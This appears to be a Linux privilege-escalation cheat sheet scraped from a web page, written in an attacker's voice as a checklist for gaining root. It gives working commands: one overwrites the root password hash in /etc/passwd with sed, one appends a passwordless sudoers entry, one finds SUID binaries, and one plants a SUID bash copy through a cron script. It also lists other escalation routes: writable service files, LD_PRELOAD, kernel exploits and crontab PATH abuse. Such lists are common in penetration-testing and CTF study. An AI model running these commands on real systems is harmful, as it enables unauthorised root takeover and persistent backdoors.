Easy loot!
Commands I can run as sudo
Check for my groups
Am I member of the docker group or lxd group?
Check for writable /etc/passwd and /etc/shadow file
Copy ls -la /etc/passwd
ls -la /etc/shadow sed command to replace the root user password
Copy sed -i "s/root:x/root:tP7HgzhGKMz0s/" /etc/passwd Add to sudoers file without password
Copy echo "ash ALL=(ALL) NOPASSWD:ALL" >> etc/sudoers Find SUID bitset
Copy find / -perm -u=s -type f 2>/dev/null One liner to create a copy of bash with the SUID bitset
Copy echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh Check if any .service file is writable
If we can modify a .service file and can reboot the system or start/stop the services, we can modify these two variable. ExecStart will specify what program or action should be performed when starting the service.
Check for mounted shares
Others element to check for
Check in bash_history file
Check for the sudo version
Check for LD_LIBRARY_ PATH variable
Check for LD_PRELOAD variable
Check for loots in /var/www/, /var/www/html, /var/mail
Kernel exploits (last things to check for)
Check your PATH variable. Anything unusual?
Have take a look on the content of the crontab file?
Is there any hidden script or files ls -la?
Have you run strings on any strange binary you may have found?
Have you run ldd against any strange binary you may have found?
Check the PATH variable in the crontab file.
Have you checked your permissions on any scripts or PATH that are running on the crontab?
Directories to look for any juicy information